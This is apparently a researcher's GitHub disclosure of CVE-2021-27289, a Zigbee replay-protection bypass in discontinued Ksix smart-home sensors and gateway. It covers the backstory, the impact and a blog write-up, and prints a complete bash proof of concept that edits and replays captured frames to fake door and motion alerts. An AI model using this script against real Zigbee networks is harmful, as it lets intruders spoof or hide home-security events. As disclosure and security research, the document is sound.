# ***🐝 CVE-2021-27289: Playback Protection Bypass on Ksix Zigbee devices***


<p align="center">
	<img src="Images/Logo_CVE.png">
</p>


---
---
---


## ***📑 Table of Contents***

* [Before We Get Serious](#before-we-get-serious)

* [The Story Behind This CVE](#the-story-behind-this-cve)

* [Vulnerability](#vulnerability)
    * [Affected Devices](#vulnerability-affected-devices)
    * [Technical Details](#vulnerability-technical-details)
    * [Attack Scenario](#vulnerability-attack-scenario)
    * [Impact](#vulnerability-impact)
    * [Proof of Concept](#vulnerability-proof-of-concept)
    * [Demo Videos](#vulnerability-demo-videos)

* [Original Blog Post](#original-blog-post)
    * [Researcher](#original-blog-post-researcher)
    * [Zigbee Basics](#original-blog-post-zigbee-basics)
    * [Background and Motivation](#original-blog-post-background-and-motivation)
    * [Early Experiments](#original-blog-post-early-experiments)
    * [Discovery](#original-blog-post-discovery)
    * [Exploitation](#original-blog-post-exploitation)
    * [Lab Setup](#original-blog-post-lab-setup)
    * [Related Research](#original-blog-post-related-research)


---
---
---


<div id='before-we-get-serious'/>

## ***🎭 Before We Get Serious***

Hi everyone,

I guess the professional thing to do was just to title this repository exactly as it is – clear, descriptive, and to the point. But when I was putting it together, a few other titles came to my mind, like:

- "A vulnerability I reported as a student... and got assigned three years later (which I only noticed two years after that 😅)"
- "The CVE I submitted during my final months at university and thought had been completely ignored"
- "It got no patch, no attention... but they stopped selling the products"
- "From final degree project to CVE, with a long nap in between"

Anyway, here's the story.


---
---
---


<div id='the-story-behind-this-cve'/>

## ***📜 The Story Behind This CVE***

While I was getting ready to disclose a new vulnerability, I remembered something I had worked on years ago - a bug I found during my final degree project while researching IoT protocols like Thread and Zigbee. At the time, I sent a report to MITRE but never heard back, so I figured it had just been ignored.

Out of curiosity, I logged back into the old Gmail account I used for the submission... and to my surprise, in 2023 - three years later - I saw that a CVE had actually been assigned.

[CVE-2021-27289](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27289), linked to the vulnerability I reported as a student.

Why did it take so long? When I first contacted the vendor, they said they didn't have enough staff to fix it and kept repeating that excuse. I told MITRE that no one seemed to be doing anything about it, so I guess they waited - probably because the issue was never going to get patched anyway.

The bug affected several Zigbee-based IoT devices made by Ksix. The core issue was that the replay protection mechanism, defined in the Zigbee specification and enforced through the frame counter, wasn't properly implemented.

Because the devices didn't check the frame counter correctly, an attacker could communicate with the network and spoof packets simply by increasing the sequence number to a value higher than the last one seen by the device. This made it possible to replay captured messages and have them accepted as valid - effectively resulting in an authentication bypass.

This repo includes everything I worked on during my final project:
- A clear breakdown of the replay attack
- The impact and which devices were affected
- Links to my original write-up and demo videos
- The proof of concept I created, which was later published by OffSec on [Exploit-DB](https://www.exploit-db.com/exploits/49169) in 2020


---
---
---


<div id='vulnerability'/>

## ***🛠️ Vulnerability***

Ksix Zigbee IoT devices are affected by a replay attack vulnerability caused by improper implementation of Zigbee's replay protection mechanisms. 

- **CVE ID**: [CVE-2021-27289](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27289)
- **CWE**: [CWE-294: Authentication Bypass by Capture-replay](https://cwe.mitre.org/data/definitions/294.html)
- **Exploit-DB**: [Ksix Zigbee Devices - Playback Protection Bypass (PoC)](https://www.exploit-db.com/exploits/49169)


<div id='vulnerability-affected-devices'/>

### ***📦 Affected Devices***

The following versions were tested and found to be vulnerable. I didn't test later versions, so they may also be affected.

- Ksix IoT Zigbee Gateway – v1.0.3  
- Ksix Zigbee Door Sensor – v1.0.7  
- Ksix Zigbee Motion Sensor – v1.0.12

> These products are no longer available on the [vendor's website](https://web.archive.org/web/20201124113630/https://www.Ksix.com/otros-productos-smart/1950-smart-home-kit-ksix-kit-de-domotica-para-el-hogar.html) or on platforms like [Amazon](https://www.amazon.es/dp/B07ZHBF1Z4), and appear to have been discontinued.


<div id='vulnerability-technical-details'/>

### ***🧬 Technical Details***

The Zigbee stack in the affected devices does not properly enforce the replay protection mechanism, which relies on the frame counter field defined in the Zigbee specification. This field is meant to ensure that received messages are fresh and haven't been replayed.

However, in this implementation, the frame counter is ignored or not correctly validated. As a result, an attacker can capture a legitimate Zigbee packet, increase its sequence number to a higher value (e.g., 250), and replay it to the network.

Since the devices only check the sequence number, they accept the message as new - allowing spoofed communication and unauthorized actions without any authentication or encryption being broken.


<div id='vulnerability-attack-scenario'/>

### ***🎯 Attack Scenario***

1. The attacker captures a Zigbee packet with a sniffer device - for example, an [APImote](http://apimote.com/) running [KillerBee](https://github.com/riverloopsec/killerbee), or a [TI CC2531](https://www.ti.com/product/CC2531) flashed for use with [Zigbee2MQTT](https://www.zigbee2mqtt.io/guide/adapters/flashing/flashing_the_cc2531.html) and [SmartRF Packet Sniffer 2](https://www.ti.com/tool/PACKET-SNIFFER).
- The attacker edits the sequence number in the captured packet, setting it to a value higher than previously seen (e.g., 250).
3. The modified packet is replayed into the Zigbee network.
4. The receiving device accepts it as a valid, new message.

Depending on the type of device and how it's integrated into the environment, this may cause false alerts or fake sensor states to appear in the app the user originally used to set up the network (e.g., motion detected, door opened) - even though nothing actually happened. In more complex setups, it could even destabilize automation workflows or trigger unintended actions based on spoofed data.


<div id='vulnerability-impact'/>

### ***💣 Impact***

These devices are typically configured using apps like [Tuya Smart](https://play.google.com/store/apps/details?id=com.tuya.smart) or similar platforms, which notify users in real time when a sensor is triggered - for example, when a door opens or motion is detected. This is what makes the following attacks particularly effective, even if the physical events never happen.

- False alerts and sensor spoofing: An attacker within range can replay captured packets to make it appear - in the app - as if a door or window has been opened, or that motion has been detected inside the house. This doesn't actually happen, but it can easily trick users, since the app sends push notifications that simulate real activity inside their home.
- Disruption and Denial of Service: As demonstrated in my final degree project, manipulating Zigbee packets can break communication between devices in a way that makes them appear online in the mobile app, even though they're no longer part of the network. This silent denial of service could prevent alerts from reaching the user - potentially hiding physical intrusions or delaying their response.

Although the direct impact of this specific replay vulnerability is limited, a deeper understanding of the protocol - like what I explored in my final degree project - reveals more advanced attack scenarios that could be carried out with minimal resources.


<div id='vulnerability-proof-of-concept'/>

### ***💻 Proof of concept***

- [Exploit-DB](https://www.exploit-db.com/exploits/49169)
- [Packet Storm](https://packetstorm.news/files/id/160331)

```
# Exploit Title: Ksix Zigbee Devices - Playback Protection Bypass (PoC)
# Date: 2020-11-15
# Exploit Author: Alejandro Vazquez Vazquez
# Vendor Homepage: https://www.Ksix.com/
# Firmware Version: (Gateway Zigbee Module - v1.0.3, Gateway Main Module - v1.1.2, Door Sensor - v1.0.7, PIR Motion Sensor - v1.0.12)
# Tested on: Kali Linux 2020.3

# The coordinator of the Zigbee network (Zigbee gateway) does not correctly check the sequence number of the packets that are sent to it, which allows forging messages from an end device to the coordinator (example: turn on a light bulb, open a door, ...) by injecting a very large value in the "sequence number" field.
# To exploit this vulnerability
#	1. Capture Zigbee traffic with a sniffer (Api-Mote) and save it in .pcap format
#	2. Open the file with Wireshark and locate the packet you want to forward (turn on a light bulb, open a door, ...)
#	3. Copy that packet as "hex dump" and save it to a .txt file
#	4. Modify the "sequence number" field to a high value such as 250
#	5. Convert the txt file to .pcap again
#	6. Forward the packet to the network, using a tool such as Killerbee

#!/bin/bash

function usage(){
	echo -e "\nUsage: $0 [ZigbeeChannel] [SecuenceNumber] [HexDumpFile] [ShortSource] [ExtendedSource] [ShortDestination] [ShortPanId] [FCS]"
	echo -e "Example: $0 11 250 Open_Door_Alert_Hex_Dump 0x0001 11:ff:11:ff:11:ff:11:ff 0x0000 0x3333 0x0000 \n"
	echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n"
}

function message(){
	echo -e "\nProof of Concept"
	echo -e "There is an incorrect check of the \"sequence number\" field on Ksix Zigbee devices\n"
	echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n"
}

function poc_playback(){
	# Variables
	ZIGBEE_CHANNEL=$1
	SECUENCE_NUMBER=$2
	HEX_DUMP_FILE=$3
	SHORT_SOURCE=$4
	EXTENDED_SOURCE=$5
	SHORT_DESTINATION=$6
	SHORT_PAN_DESTINATION=$7
	FRAME_CHECK_SECUENCE=$8
	declare -a first_line_array
	declare -a second_line_array
	declare -a last_line_array
	# Change packet fields
	while IFS= read -r line
	do
		if [[ "$line" == "0000"* ]]; then
			IFS=' ' read -ra first_line_array <<< "$line"
			first_line_array[0]+="  "
			first_line_array[3]=$( printf "%x" $SECUENCE_NUMBER )
			first_line_array[4]=${SHORT_PAN_DESTINATION:4:2}
			first_line_array[5]=${SHORT_PAN_DESTINATION:2:2}
			first_line_array[6]=${SHORT_DESTINATION:4:2}; first_line_array[11]=${SHORT_DESTINATION:4:2}
			first_line_array[7]=${SHORT_DESTINATION:2:2}; first_line_array[12]=${SHORT_DESTINATION:2:2}
			first_line_array[8]=${SHORT_SOURCE:4:2}; first_line_array[13]=${SHORT_SOURCE:4:2}
			first_line_array[9]=${SHORT_SOURCE:2:2}; first_line_array[14]=${SHORT_SOURCE:2:2}
			echo "${first_line_array[@]}" > Check_Secuence_Number_Incorrectly_HEX_Dump
		elif [[ "$line" == "0010"* ]]; then
			IFS=' ' read -ra second_line_array <<< "$line"
			second_line_array[0]+="  "
			second_line_array[7]=${EXTENDED_SOURCE:21:2}; second_line_array[8]=${EXTENDED_SOURCE:18:2}
			second_line_array[9]=${EXTENDED_SOURCE:15:2}; second_line_array[10]=${EXTENDED_SOURCE:12:2}
			second_line_array[11]=${EXTENDED_SOURCE:9:2}; second_line_array[12]=${EXTENDED_SOURCE:6:2}
			second_line_array[13]=${EXTENDED_SOURCE:3:2}; second_line_array[14]=${EXTENDED_SOURCE:0:2}
			echo "${second_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump
		elif [[ "$line" == "0030"* ]]; then
			IFS=' ' read -ra last_line_array <<< "$line"
			last_line_array[0]+="  "
			last_line_array[11]=${FRAME_CHECK_SECUENCE:4:2}
			last_line_array[12]=${FRAME_CHECK_SECUENCE:2:2}
			echo "${last_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump
		else
			echo "$line" >> Check_Secuence_Number_Incorrectly_HEX_Dump
		fi
	done < $HEX_DUMP_FILE
	# Hex Dump file to pcap
	text2pcap Check_Secuence_Number_Incorrectly_HEX_Dump Check_Secuence_Number_Incorrectly.pcap
	# Playback
	zbreplay --channel $ZIGBEE_CHANNEL --pcapfile Check_Secuence_Number_Incorrectly.pcap && echo -e "\nPacket sent to the network. Poc Completed.\n"
}

function main(){
	if [ $# -lt 8 ]; then
		echo -e "\n\t Missing arguments"
		usage
		exit
	else
		message
		poc_playback $1 $2 $3 $4 $5 $6 $7 $8
	fi
}

main $1 $2 $3 $4 $5 $6 $7 $8

#NOTE: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message "Door open".
            
```


<div id='vulnerability-demo-videos'/>

### ***🎥 Demo videos***

- [YouTube Video - CVE-2021-27289: Replay attack on Ksix Zigbee devices (Overview + Old Demos)]() - Coming soon. I'll be reuploading the original demos I recorded back in 2020, this time with commentary explaining the environment setup, the attack process, and more.


---
---
---


<div id='original-blog-post'/>

## ***📝 Original Blog Post***

The original blog post was published back in 2020 on what was then my main personal website (ah, the nostalgia 😅). At the time, I shared a technical write-up to support my CVE request to MITRE, to submit the proof-of-concept exploit to Exploit-DB, and to publish the demo videos (which I've now reuploaded to a different YouTube account).

What you'll find below is a slightly restructured version of that original post.


<div id='original-blog-post-researcher'/>

### ***👤 Researcher***

A 22-year-old Alejandro Vázquez Vázquez, just starting to take cybersecurity seriously - slowly turning a passion into a career.


<div id='original-blog-post-zigbee-basics'/>

### ***📡 Zigbee Basics***

If you're unfamiliar with Zigbee, I don't expect you to go through my thesis report or the complete IEEE 802.15.4 specification. Instead, I recommend these excellent resources to get a solid understanding of the protocol:

- [Kudelski Security Research - ZigBee Security: Basics (Part 1)](https://research.kudelskisecurity.com/2017/11/01/zigbee-security-basics-part-1/)
- [Kudelski Security Research - ZigBee Security: Basics (Part 2)](https://research.kudelskisecurity.com/2017/11/08/zigbee-security-basics-part-2/)
- [Kudelski Security Research - ZigBee Security: Basics (Part 3)](https://research.kudelskisecurity.com/2017/11/21/zigbee-security-basics-part-3/)
- [Payatu - Zigbee Security 101 (Architecture and Security Issues)](https://payatu.com/blog/zigbee-security-101-architecture-and-security-issues/)
- [Hong Kong Computer Emergency Response Team Coordination Centre (HKCERT) - Device (ZigBee) Security Study](https://www.hkcert.org/f/guideline/264461/3a1c8eed-012c-4b59-9d9e-971001d66c77-DLFE-14602.pdf)


<div id='original-blog-post-background-and-motivation'/>

### ***💡 Background and Motivation***

For my final degree project, I chose a topic that was a bit unconventional at my university: instead of developing an application, I focused entirely on researching and analyzing communication protocols. I picked this path because it allowed me to explore what I saw as a critical area at the time - the security of IoT devices.

My work centered on the Zigbee and Thread protocols, as well as their foundation: IEEE 802.15.4. Once I had reviewed enough technical documentation and academic research, I moved on to hands-on testing with real devices, aiming to replicate and analyze known vulnerabilities in the field.


<div id='original-blog-post-early-experiments'/>

### ***🔍 Early Experiments***

My testing began with a Zigbee motion sensor. I wanted to see how the device would respond to a spoofed control message - specifically, a network realignment frame, which is normally used to reset Zigbee configuration parameters. I injected one into the network to simulate a reconfiguration - and it worked. The sensor still appeared as "connected" in the mobile app (the one I had used to set up the network), but it had actually lost communication with the coordinator and had to be manually reset. That told me the device was accepting certain packets without strong validation.

Encouraged by this result, I moved on to replay attacks. Using a sniffer, I captured standard Zigbee messages from a door sensor (such as "door open" and "door close"). After resetting the Zigbee network, I replayed those packets without modifying any fields. To my surprise, the mobile app triggered real-time alerts, as if the door had just been opened or closed - even though I was simply replaying previously captured messages.

This confirmed that the protection mechanisms designed to prevent replay attacks were either not implemented or not functioning correctly on these devices.


<div id='original-blog-post-discovery'/>

### ***💥 Discovery***

At this point, I wanted to better understand why replaying old packets was working. Zigbee defines two key fields to prevent this kind of attack: the frame counter, which increases with every message sent, and the sequence number, which helps detect duplicates.

So I started experimenting with both.

First, I captured about 50 valid packets and replayed them into the network. I received several alerts, just like before. Then I modified the frame counter, setting it to a much higher value in each packet, and tried again. This time, nothing happened - no alerts. That made me suspect that some kind of check was being performed, but inconsistently.

To dig deeper, I reset the Zigbee network again, and instead of modifying the frame counter, I focused on the sequence number. I replayed the same captured messages but gradually increased the sequence number with each packet, simulating what a normal device would do.

It worked.

Alerts started popping up again in the mobile app. That's when I realized the devices were likely relying only on the sequence number to determine if a packet was new - and completely ignoring the frame counter, which is the field explicitly designed to prevent replay attacks.

This flaw meant that as long as I kept sending packets with newer sequence numbers, I could keep injecting fake messages into the network - and the devices would accept them as legitimate.

So, due to a poor implementation - or perhaps limited processing capabilities on the coordinator (Zigbee gateway) - I could, simply by being within wireless range of the network, replay previously captured messages like "door open" or "door close". These spoofed events would then appear in the mobile app exactly as if they had just happened in real life.


<div id='original-blog-post-exploitation'/>

### ***🧨 Exploitation***

Exploiting the vulnerability is trivial: 

You capture a valid Zigbee frame, change the sequence number to a higher value, and replay it. The receiving device accepts the message, and the user gets a real-time alert in their app, believing there was actual activity.

In some tests, I was even able to disrupt device communication, causing sensors to stay "online" in the app but become unresponsive, which could be dangerous in physical security scenarios.


<div id='original-blog-post-lab-setup'/>

### ***🔬 Lab Setup***

The tests were conducted in 2020 using a small lab of Zigbee-based IoT devices manufactured by Ksix. The following models and firmware versions were confirmed to be vulnerable at the time:

- Zigbee Gateway Module – v1.0.3  
- Gateway Main Module – v1.1.2  
- Door Sensor – v1.0.7  
- PIR Motion Sensor – v1.0.12  

To perform the attacks and capture Zigbee traffic, I used:

- APImote, a USB hardware sniffer for IEEE 802.15.4 networks
- KillerBee Framework, used for capturing, injecting, and analyzing packets

This setup allowed me to simulate real-world interactions, analyze traffic flows, and test both denial-of-service and replay attack scenarios in a controlled environment.


<div id='original-blog-post-related-research'/>

### ***📚 Related Research***

From here I thank all the researchers who made my way easier and from whose publications I learned the most common attack vectors and vulnerabilities of this type of IoT networks:

- [Fan, X., Susan, F., Long, W., & Li, S. (2017). Security Analysis of Zigbee.](https://www.semanticscholar.org/paper/Security-Analysis-of-Zigbee-Fan-Susan/3d1d5a51d05cde08b6e52afd5bd7bc325b487a10?p2df)
- [Zillner, T. (2016). ZigBee Exploited: The good, the bad and the ugly.Magdeburger Journal zur Sicher-heitsforschung,12, 699–704.](https://www.blackhat.com/docs/us-15/materials/us-15-Zillner-ZigBee-Exploited-The-Good-The-Bad-And-The-Ugly.pdf)
- [Sokullu, R., Korkmaz, I., Dagdeviren, O., Mitseva, A., & Prasad, N. R. (2007). An Investigation on IEEE 802.15.4 MAC Layer Attacks. In Proceedings of The 10th International Symposium on Wireless Personal Multimedia Communications (WPMC) 2007 (pp. 1019-1023).](https://www.researchgate.net/publication/4373276_On_the_IEEE_802154_MAC_layer_attacks_GTS_attack)
- [R. Sokullu, O. Dagdeviren and I. Korkmaz, "On the IEEE 802.15.4 MAC Layer Attacks: GTS Attack," 2008 Second International Conference on Sensor Technologies and Applications (sensorcomm 2008), Cap Esterel, 2008, pp. 673-678, DOI: 10.1109/SENSORCOMM.2008.75.](https://ieeexplore.ieee.org/document/4622738)
- [M. S. Wara and Q. Yu, "New Replay Attacks on ZigBee Devices for Internet-of-Things (IoT) Applications," 2020 IEEE International Conference on Embedded Software and Systems (ICESS), Shanghai, China, 2020, pp. 1-6, DOI: 10.1109/ICESS49830.2020.9301593.](https://ieeexplore.ieee.org/document/9301593)
- [Olawumi, Olayemi & Haataja, Keijo & Asikainen, M. & Vidgren, Niko & Toivanen, Pekka. (2014). Three Practical Attacks Against ZigBee Security: Attack Scenario Definitions, Practical Experiments, Countermeasures, and Lessons Learned.. 2014 14th International Conference on Hybrid Intelligent Systems, HIS 2014. DOI: 10.1109/HIS.2014.7086198.](https://www.researchgate.net/publication/276272068_Three_Practical_Attacks_Against_ZigBee_Security_Attack_Scenario_Definitions_Practical_Experiments_Countermeasures_and_Lessons_Learned)
